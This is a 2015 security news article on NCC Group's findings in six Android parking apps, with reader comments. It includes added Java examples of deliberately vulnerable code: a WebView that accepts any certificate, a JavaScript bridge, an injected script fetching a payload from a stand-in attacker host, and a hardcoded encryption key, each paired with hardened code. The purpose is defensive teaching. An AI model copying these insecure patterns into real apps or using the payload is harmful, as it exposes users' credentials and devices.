Vulnerable parking apps allow hackers to steal your login and credit card details


A review of several Android pay-for-parking applications has uncovered a series of vulnerabilities that could allow attackers to steal drivers' logins and hijack their mobile devices.

Conducted by information assurance firm NCC Group, the assessment analyzed six parking applications for the Android operating system. Some of the apps had been downloaded from Google Play between 5,000 and 10,000 times, whereas others boasted one million registered users.

The number of installs for each app ultimately did not matter, however, as all of the applications were affected by security vulnerabilities.

According to an NCC Group blog post, the review determined that while all of the apps used encryption to protect their customers' sensitive information - something from which four major airlines should learn a lesson or two - not one of them verified the certificate presented by the server.

Attackers could exploit this oversight to conduct man-in-the-middle (MITM) attacks, with especially severe consequences if the application used Android WebView and exposed a JavaScript bridge that let script running in the WebView call native device functions.

"In this scenario the attacker could inject HTML or JavaScript into the web page requested from the server. This script then executes within the context of the Android application and can potentially instruct the device to download a malicious payload from the attacker's server, providing access to the user's phone with the privileges of the application."
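The attack described in that quote, as an added example (this is not NCC Group's code, nor code from any of the apps reviewed): a WebView that swallows TLS errors and exposes a native bridge, the page a man-in-the-middle would serve in place of the real one, and the hardened equivalent. The class and method names (ParkingWebViewExample, NativeBridge, downloadUpdate, the "ParkingApp" bridge name) and both URLs are hypothetical.

```java
import android.annotation.SuppressLint;
import android.net.http.SslError;
import android.webkit.JavascriptInterface;
import android.webkit.SslErrorHandler;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Added example; hypothetical class/method names, not from any reviewed app.
public class ParkingWebViewExample {

    // The bridge object. On API < 17 every public method (and getClass(), hence
    // reflection) is reachable from page JS; from API 17 only @JavascriptInterface
    // methods are, but a method like this one is still a remote-controlled
    // downloader for whoever controls the page content.
    static class NativeBridge {
        @JavascriptInterface
        public void downloadUpdate(String url) {
            // fetch url and run/install the result -- body omitted on purpose
        }
    }

    // VULNERABLE: swallowing TLS errors means any certificate is accepted, so a
    // man-in-the-middle controls the HTML the WebView renders and executes.
    static final WebViewClient ACCEPT_ANY_CERT = new WebViewClient() {
        @Override
        public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
            handler.proceed();   // the classic "fix" for a certificate warning
        }
    };

    @SuppressLint({"SetJavaScriptEnabled", "AddJavascriptInterface"})
    static void vulnerable(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);
        webView.setWebViewClient(ACCEPT_ANY_CERT);
        webView.addJavascriptInterface(new NativeBridge(), "ParkingApp");
        webView.loadUrl("https://pay.example-parking.test/");   // hypothetical URL
    }

    // What the attacker serves in place of the real page (constructed). It runs
    // inside the app's process and reaches native code through the bridge.
    static final String INJECTED_HTML =
        "<script>ParkingApp.downloadUpdate('https://attacker.test/payload.apk');</script>";

    // HARDENED: let the platform reject bad certificates (the default
    // WebViewClient.onReceivedSslError calls handler.cancel()), expose no bridge
    // unless the page genuinely needs one, and keep JavaScript and file access
    // off when the content does not require them.
    static void hardened(WebView webView) {
        webView.setWebViewClient(new WebViewClient());   // default: cancels on SSL error
        webView.removeJavascriptInterface("ParkingApp");
        webView.getSettings().setJavaScriptEnabled(false);
        webView.getSettings().setAllowFileAccess(false);
        webView.loadUrl("https://pay.example-parking.test/");
    }
}
```

The point of the contrast is that the bridge itself is not the bug; it is the combination of a bridge with a connection whose server identity was never checked. Fix the certificate handling first, then shrink the bridge to the minimum the page needs.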


Chris Spencer of NCC Group adds that more persistent attacks could leverage an initial man-in-the-middle attack to eventually take control of the device. This holds even when TLS/SSL is in use, though not all of the applications used it.

One application in particular employed its own encryption scheme, with the keys stored in the application code. Both the keys and the decryption routine could easily be retrieved from the app, allowing an attacker to decrypt and steal users' login credentials and credit card information.

If those vulnerabilities weren't enough, most of the applications also exhibited flawed data storage procedures.

For example, some stored passwords and PINs locally on the device, which could lead to data theft if those values were not stored securely. One app relied on the application's private data directory to protect a user's password, which it stored unencrypted, but NCC Group was able to exploit a path traversal vulnerability to recover it.
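An added example covering both storage problems above, the hardcoded key and the plaintext password in the private directory (this is illustrative code, not NCC Group's and not from any of the apps reviewed): the weak patterns side by side with an Android Keystore-backed alternative that stores a session token instead of the password. The key bytes, file name and key alias are constructed placeholders.

```java
import android.content.Context;
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import java.io.File;
import java.io.FileOutputStream;
import java.nio.charset.StandardCharsets;
import java.security.KeyStore;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// Added example; placeholder names and values, not from any reviewed app.
public final class CredentialStorage {

    // VULNERABLE: a home-grown scheme. The key is a literal in the DEX, so anyone
    // with jadx/apktool reads both the key and this method and decrypts every
    // stored credential. AES/ECB additionally leaks repeated plaintext blocks.
    private static final byte[] HARDCODED_KEY =
        "0123456789abcdef".getBytes(StandardCharsets.UTF_8);   // constructed placeholder

    static byte[] vulnerableEncrypt(byte[] plaintext) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(HARDCODED_KEY, "AES"));
        return c.doFinal(plaintext);
    }

    // VULNERABLE: the private data directory is only as private as the app's own
    // file handling; one path traversal anywhere in the app exposes this file.
    static void vulnerableStorePassword(Context ctx, String password) throws Exception {
        File f = new File(ctx.getFilesDir(), "creds.txt");   // placeholder file name
        try (FileOutputStream out = new FileOutputStream(f)) {
            out.write(password.getBytes(StandardCharsets.UTF_8));
        }
    }

    // HARDENED: (1) never persist the password; persist a revocable session token.
    // (2) Protect it with a key generated inside Android Keystore (API 23+). The
    // key material never leaves the Keystore, so there is nothing in the APK or on
    // disk to extract, and a leaked file is ciphertext without its key.
    private static final String ALIAS = "parking_session_key";   // hypothetical alias

    static SecretKey keystoreKey() throws Exception {
        KeyStore ks = KeyStore.getInstance("AndroidKeyStore");
        ks.load(null);
        if (ks.containsAlias(ALIAS)) {
            return ((KeyStore.SecretKeyEntry) ks.getEntry(ALIAS, null)).getSecretKey();
        }
        KeyGenerator kg = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");
        kg.init(new KeyGenParameterSpec.Builder(ALIAS,
                    KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
                .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
                .setKeySize(256)
                .build());
        return kg.generateKey();
    }

    // Returns iv || ciphertext. GCM gives confidentiality and integrity; the
    // Keystore picks a fresh 12-byte IV per encryption, which must be kept with
    // the ciphertext for decryption.
    static byte[] sealToken(byte[] token) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, keystoreKey());
        byte[] iv = c.getIV();
        byte[] ct = c.doFinal(token);
        byte[] out = new byte[iv.length + ct.length];
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ct, 0, out, iv.length, ct.length);
        return out;
    }

    static byte[] openToken(byte[] sealed) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        byte[] iv = Arrays.copyOfRange(sealed, 0, 12);
        c.init(Cipher.DECRYPT_MODE, keystoreKey(), new GCMParameterSpec(128, iv));
        return c.doFinal(sealed, 12, sealed.length - 12);
    }
}
```

Two design choices matter more than the cipher: the password is never written to disk at all (the server issues a token the user can revoke), and the key that protects the token cannot be pulled out of the APK because it was never in it.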


All of these vulnerabilities notwithstanding, the review did find that some of the apps had attempted to ward off attackers by using hashing algorithms and obfuscating their code.

NCC Group says that it responsibly disclosed details of the vulnerabilities to the app vendors.

Spencer writes that, to protect their products from man-in-the-middle attacks, app developers should use TLS together with certificate pinning, alongside hashing and other techniques.

As for the regular driver, it is highly ill-advised to use any application that could expose sensitive or financial information while you are connected to a public network. Sure, you might be on your mobile data connection rather than Wi-Fi when paying for your parking. But even then you might not be safe, as an attacker could set up a fake GSM base station.

Ultimately, it might be better to just bring some change and pay for parking the old fashioned way.

flickr photo shared by compujeramey under a Creative Commons ( BY ) license.



4 Responses

  1. Dan

    December 15, 2015 at 4:44 pm #

    Have there been any recent compromises with the parking meters that take credit cards instead of cash as well?

  2. Paul Eldred

    December 16, 2015 at 10:17 am #

    Can you name and shame these apps please?
    I was forced to use a parking app at the weekend (against my better judgment) because all four machines in the car park were out of action. Other shoppers said "<expletive deleted> I don't have a phone" and walked off without paying.

    • Graham Cluley in reply to Paul Eldred.

      December 16, 2015 at 2:12 pm #

      Unfortunately, NCC Group has chosen not to name them in its report – so we're as much in the dark as you.

      However, the report's authors are UK-based which narrows down the field somewhat and they give some indication of the user base for the apps.

      When I think of parking apps used in the UK a couple of names immediately spring to mind, so I would be surprised if they weren't amongst those that NCC tested.

      If anyone else knows more, please post a follow-up comment!

  3. David L

    December 16, 2015 at 3:29 pm #

    Webview and Java go together like Bonnie and Clyde! Infamous thieves, bank robbers.
    This is one of the major reasons Google pulled Webview out of the OS to update through the Play Store. Many apps use the native Webview for connecting to the web. Any version of Android running 4.3 Jelly Bean and lower is especially vulnerable. And any browsers on those can be easily compromised. Last time I checked, there were like 7-10 major vulnerabilities for the older operating systems.
